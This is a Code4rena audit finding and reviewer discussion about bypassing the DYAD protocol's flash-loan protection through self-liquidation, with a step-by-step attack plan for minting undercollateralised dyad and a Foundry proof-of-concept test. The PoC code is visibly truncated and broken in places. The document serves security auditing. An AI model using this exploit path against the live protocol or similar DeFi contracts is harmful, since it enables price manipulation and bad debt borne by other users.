code-423n4 / 2024-04-dyad-findings

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Flash loan protection mechanism can be bypassed via self-liquidations #68

Open c4-bot-1 opened 4 months ago

c4-bot-1 commented 4 months ago

Lines of code

Vulnerability details


The protocol implements a flash-loan manipulation protection mechanism with the idToBlockOfLastDeposit variable. This values is set to the current block number during a deposit, and is checked during a withdrawal. If the system detects a deposit and withdrawal in the same block, the system reverts the transaction.

//function deposit
idToBlockOfLastDeposit[id] = block.number;

//function withdraw
if (idToBlockOfLastDeposit[id] == block.number) revert DepositedInSameBlock();

The issue is that there is another way to move funds around: liquidations. This calls the move function to transfer around the balances, and does not update the idToBlockOfLastDeposit of the receiving account.

 function liquidate(
    uint id,
    uint to
    vault.move(id, to, collateral);

So, a user can

  1. Take out a flashloan. Deposit funds into a vault A. Mint dyad.
  2. Manipulate the price of kerosene to trigger a liquidation.
  3. Liquidate themselves and send their collateral to vault B.
  4. Withdraw from vault B in the same block.
  5. Pay off their flashloans.

The step 2 involves manipulating the price of kerosene, which affects their collateralization ratio. This has been discussed in a separate issue, and mainly states that if the user mints more dyad against free collateral in the system, or if any user takes out free collateral in the system, the price of kerosene will fall.

The flaw being discussed in this report is that the flash loan protection mechanism can be bypassed. This is different from the price manipulation issue and is thus a separate issue. Since this bypasses one of the primary safeguards in the system, this is a high severity issue.

Proof of Concept

The POC exploit setup requires 4 accounts: A, B, C and D. A is where the flashed funds will be deposited to. B is where the liquidated funds will be deposited to. C is for manipulating the kerosene price. D is for minting dyad at manipulated price to accrue bad debt in the system.

A is used to inflate the price of kerosene. B is used to bypass the flash loan protection mechanism. C is used to deflate the price of kerosene. D is used to mint dyad at the inflated price, accruing bad debt in the system and damaging the protocol.

  1. Assume C has 1 million usdc tokens with 0 debt. C inflates the price of kerosene up by contributing to TVL, and will be used later to push the price down.
  2. Alice takes out a flashloan of 10 million usdc tokens. She deposits them in account A.
  3. Due to the sudden added massive flashloaned TVL, the internal price of kerosene shoots up.
  4. Alice uses account D to mint out dyad tokens at this condition. Alice can now mint out exactly as many dyad tokens as her exo collateral. This is allowed since the price of kerosene is inflated, which covers the collateralization ratio. Alice effectively has a CR of cllose to 1.0 but the system thinks its 1.5 due to kerosene being overvalued. The system is still solvent at this point.
  5. Alice buys kerosene from the market and adds it in account A and then mints dyad until account A has a CR of 1.5. The actual CR of A ignoring kerosene is close to 1.0.
  6. Alice now removes collateral from account C. This reduces the price of C, making Account A liquidatable.
  7. Alice now liquidates account A and sends the collateral to account B. This inflates the price of kerosene again since dyad supply has gone down, and she can repeat steps 5-6 multiple times since she can now mint more dyad tokens again.
  8. Alice gets a large portion of her flashed funds into account B She withdraws them back out. This again drops the price of kerosene, allowing her to liquidate A more and and recover more of her funds into account B.
  9. Alice pays back her flashloan.
  10. Account D is now left with a CR close to 1.0, since the price of kerosene has now gone back to normal. Any price fluctuations in the exo collateral will now lead to bad debt.

This lets Alice open positions at a CR of close to 1.0. This is very dangerous in a CDP protocol, since Alice's risk is very low as she can sell off the minted dyad to recover her investment, but the protocol is now at a very risky position, close to accruing bad debt. Thus this is a high severity issue.

Tools Used

Manual Review

Recommended Mitigation Steps

The flashloan protection can be bypassed. MEV liquidation bots rely on flashloans to carryout liquidations, so there isnt a very good way to prevent this attack vector. Making the price of kerosene less manipulatable is a good way to lower this attack chance. However the system will still be open to flashloan deposits via liquidations.

Incorporating a mint fee will also help mitigate this vector, since the attacker will have a higher cost to manipulate the system.

Assessed type


c4-pre-sort commented 4 months ago

JustDravee marked the issue as high quality report

c4-pre-sort commented 4 months ago

JustDravee marked the issue as primary issue

koolexcrypto commented 4 months ago

@carrotsmuggler the attack assumes that kerosine is used within the CR. Could you please clarify how the attacker would acquire this big amount of kerosine?

Marking this as valid for now, re-evaluating in PJQA phase.

c4-judge commented 4 months ago

koolexcrypto changed the severity to 2 (Med Risk)

c4-judge commented 4 months ago

koolexcrypto marked the issue as satisfactory

carrotsmuggler commented 4 months ago

@koolexcrypto kerosene can just be bought off of DEXs and other open markets. In this attack, kerosene is not being flashloaned. Kerosene is just required as an initial investment. USDC is flashloaned, and dyad tokens are minted against that up to a CR of 1.5, which drops to 1.0 once the value of kerosene drops.

The point of the issue is to show that the flashloan protection can be bypassed, which is being done here by utilising multiple accounts.

koolexcrypto commented 4 months ago


Thank you for your input. I requested the answer in PJQA,my bad, I didn't communicate this better.

I'm requesting a PoC (with code) in order to be able to evaluate the severity better. At the moment, the attack is too expensive since the attacker should hold a big amount of Kerosene, which practically difficult since Kerosene is being distributed over 10 years. Unless there is a demonstrated impact on the protocol, this would be a QA. Please prepare the PoC and post it in PJQA phase.

c4-judge commented 3 months ago

koolexcrypto marked the issue as selected for report

jorgect207 commented 3 months ago

Thanks t0 the judge and everyone who participate in this.

I consider that this is not a valid vulnerability for next reasons:

  1. The first one and the most important is that just bypass the flash loan protection in fact is not a vulnerability:
    • just bypassing the flash loan protection can let Assets not at direct risk? No.
    • just bypassing the flash loan protection could be impact the function of the protocol? No.
  2. The real vulnerability is the manipulation of the kerosene value and with this manipulation the liquidations which is describe in #67

For this reasons, i think that this issue have to be duplicated of #67 or QA.

Emedudu commented 3 months ago

The first one and the most important is that just bypass the flash loan protection in fact is not a vulnerability

So why did the protocol put a defense mechanism in place to prevent flashloan attacks?

This report identifies a root issue(which is bypassing of the flashloan protection, allowing flashloan attacks), and has proved how this issue has an impact on the protocol.

jorgect207 commented 3 months ago

hey @Emedudu the protocol put defense again flash loan to prevent a major attack, but indeed just bypass the flash loan protection is not at vulnerability, you basically are depositing and withdrawing in the same block.timestamp but it's the protocol losing funds? No, is the function of the protocol or its availability could be impacted? No, i just following code4arena rules and my discernment.

Just bypass the flash loan protection is not a vulnerability is you are no actually attacking the protocol, but you explain about the kerosone manipulation which is a valid findings, that why i think that this should be duplicate of #67

Emedudu commented 3 months ago

Hi @jorgect207

Every flashloan attack that has ever happened could have also been done by a rich attacker.

What makes flashloan attacks severe is that they allow anyone to perform those attacks.

Protocol is aware of this, and that's why they put in place a flashloan protection mechanism.(This also explains why #67 is acknowledged, while this issue is confirmed)

Al-Qa-qa commented 3 months ago

This issue is not dup #67, as the root cause is different.

For the impact of The flashloan attack, the report says that this will manipulate kerosine price, and the protocol pointed to the kind of issues via flash loan.

There is another impact, which is liquidating users' positions, and I mentioned how this will occur in my report #1114

carrotsmuggler commented 3 months ago

The problem this issue addresses, is that the flash loan protection can be bypassed. For that, a POC is taken from the issue no 537 showing that self liquidation can be used to flash funds, manipulate the system, and then take them out in the same transaction. The same is quoted below.

However, the main point of contention here seems to be the impact. Flashloans in general don't do anything a well funded attacker cannot do on their own, and not an exploit on their own. However, they can be used to exacerbate an existing problem by anyone, well funded or not.

To eradicate this vector, and to make the system less manipulatable, the devs had put in certain restrictions. This issue shows that these restrictions are insufficient. So users can use flashloans and thus a near infinite amount of funds to manipulate the system. This was reported since the devs had explicitly put up a counter to this.

Since this breaks the safeguards put in place by the devs and makes the system more easily manipulatable, I believe this is of medium severity. This can be used to #67, but should not be a duplicate. This can also be abused to mint positions at 100% CR instead of 150% with a very large volume by anyone due to the flashloans, which makes the system way more unstable. Even small changes in price at that condition will be enough to cause bad debt to the system then.

// SPDX-License-Identifier: MIT
pragma solidity =0.8.17;

import "forge-std/Test.sol";
import "forge-std/console.sol";
import {DeployBase, Contracts} from "../script/deploy/DeployBase.s.sol";
import {Parameters} from "../src/params/Parameters.sol";
import {DNft} from "../src/core/DNft.sol";
import {Dyad} from "../src/core/Dyad.sol";
import {Licenser} from "../src/core/Licenser.sol";
import {VaultManagerV2} from "../src/core/VaultManagerV2.sol";
import {Vault} from "../src/core/Vault.sol";
import {OracleMock} from "./OracleMock.sol";
import {ERC20Mock} from "./ERC20Mock.sol";
import {IAggregatorV3} from "../src/interfaces/IAggregatorV3.sol";
import {ERC20} from "@solmate/src/tokens/ERC20.sol";

import {KerosineManager}        from "../src/core/KerosineManager.sol";
import {UnboundedKerosineVault} from "../src/core/Vault.kerosine.unbounded.sol";
import {BoundedKerosineVault}   from "../src/core/Vault.kerosine.bounded.sol";
import {Kerosine}               from "../src/staking/Kerosine.sol";
import {KerosineDenominator}    from "../src/staking/KerosineDenominator.sol";

contract VaultManagerV2Test is Test, Parameters {
  DNft         dNft;
  Licenser     vaultManagerLicenser;
  Licenser     vaultLicenser;
  Dyad         dyad;
  VaultManagerV2 vaultManagerV2;

  // weth
  Vault        wethVault;
  ERC20Mock    weth;
  OracleMock   wethOracle;

  Kerosine kerosine;
  UnboundedKerosineVault unboundedKerosineVault;

  KerosineManager        kerosineManager;
  KerosineDenominator    kerosineDenominator;

  address user1;
  address user2;

  function setUp() public {
    dNft       = new DNft();
    weth       = new ERC20Mock("WETH-TEST", "WETHT");
    wethOracle = new OracleMock(3000e8);

    vaultManagerLicenser = new Licenser();
    vaultLicenser        = new Licenser();

    dyad   = new Dyad(vaultManagerLicenser);

    //vault Manager V2
    vaultManagerV2    = new VaultManagerV2(

       wethVault                   = new Vault(

    kerosineManager = new KerosineManager();


    //kerosine token
    kerosine = new Kerosine();
    //Unbounded KerosineVault
    unboundedKerosineVault = new UnboundedKerosineVault(

    kerosineDenominator       = new KerosineDenominator(

    //Licenser add vault

    //vaultManagerLicenser add manager


function testFlashLoanAttackUsingLiquidateSimulation() public{
    //1 The attacker prepares two NFTs ,some collateral and some Kerosene Token.
    uint id = mintDNft();
    uint id_for_liquidator = mintDNft();, 1e18);

    //2 deposit all the non-Kerosene collateral in the vault with One NFT like id=1 
    vaultManagerV2.add(id_for_liquidator, address(wethVault));
    weth.approve(address(vaultManagerV2), 1e18);
    vaultManagerV2.deposit(id_for_liquidator, address(wethVault), 1e18);

    //3 In the next blocknumber, flashloan non-Kerosene collateral from Lending like Aave,
    vm.roll(block.number + 1);, 1e18);//Simulation borrow 1 weth

    //deposit all the borrowed flashloan non-Kerosene collateral and Kerosene Token in the vault with One NFT like id=0
    vaultManagerV2.add(id, address(wethVault));
    weth.approve(address(vaultManagerV2), 1e18);
    vaultManagerV2.deposit(id, address(wethVault), 1e18);

    vaultManagerV2.addKerosene(id, address(unboundedKerosineVault));
    kerosine.approve(address(vaultManagerV2), 1000_000_000e18);
    vaultManagerV2.deposit(id, address(unboundedKerosineVault), 1000_000_000e18);

    //Mint the max number Dyad you can
    vaultManagerV2.mintDyad(id, 1000e18, address(this));
    uint256 cr = vaultManagerV2.collatRatio(id); //2e18
    assertEq(cr, 2e18);

    //withdraw using id_for_liquidator,  manipulate the  Kerosene price
    vaultManagerV2.withdraw(id_for_liquidator, address(wethVault), 1e18, address(this));
    cr = vaultManagerV2.collatRatio(id); //1e18
    assertEq(cr, 1e18);
    vaultManagerV2.liquidate(id, id_for_liquidator);
    //withdraw the vault which is move from id  using id_for_liquidator
    vaultManagerV2.withdraw(id_for_liquidator, address(wethVault), 1e18, address(this));
    console.log("weth balance is ", weth.balanceOf(address(this))/1e18);

  function mintDNft() public returns (uint) {
    return dNft.mintNft{value: 1 ether}(address(this));

 function deposit(
    ERC20Mock token,
    uint      id,
    address   vault,
    uint      amount
  ) public {
    vaultManagerV2.add(id, vault);, amount);
    token.approve(address(vaultManagerV2), amount);
    vaultManagerV2.deposit(id, address(vault), amount);

  receive() external payable {}

  function onERC721Received(
    bytes calldata
  ) external pure returns (bytes4) {
    return 0x150b7a02;
adamidarrha commented 3 months ago

for the impact the sponsors stated quite clearly from the DYAD code4rena contest page that the main point of migrating from vaultManagerV1 to V2 is the need for a flashloan protection mechanism, and the impact of the bypass is the ability to manipulate kerosene price which could lead to mass liquidations as discussed in separate issues:

Attack ideas (where to focus for bugs)

Manipulation of Kerosene Price.

Flash Loan attacks.


The goal is to migrate from VaultManager to VaultManagerV2. The main reason is the need for a flash loan protection which makes it harder to manipulate the deterministic Kerosene price.

koolexcrypto commented 3 months ago

Thank you all for your input.

After reading all the comments above, I believe this should be a valid high due to the following reasons:

c4-judge commented 3 months ago

koolexcrypto changed the severity to 3 (High Risk)